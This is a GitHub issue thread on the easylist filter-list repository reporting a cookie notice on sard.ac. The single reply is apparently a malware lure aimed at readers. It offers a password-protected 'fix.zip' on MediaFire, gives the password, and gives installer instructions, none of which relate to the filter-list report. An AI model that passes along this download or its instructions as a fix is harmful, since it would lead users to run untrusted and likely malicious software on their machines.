### ISSUE TITLE
sard.ac: cookie notice

### ISSUE THREAD

**Issue by Tiagoquix** [easylist/easylist#19897]
#### List the website(s) you're having issues with:

`https://www.sard.ac/`

#### What happens?

Cookie notice

#### Screenshot(s) 

![image](https://github.com/user-attachments/assets/a7015c6a-24c9-45b0-b5ba-1ff01e1fb747)

#### Filter lists you're using:

Easylist Cookie

#### Your settings:

- OS/version: Linux
- Browser/version: Firefox latest
- Ad block extension/version: uBlock Origin latest

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
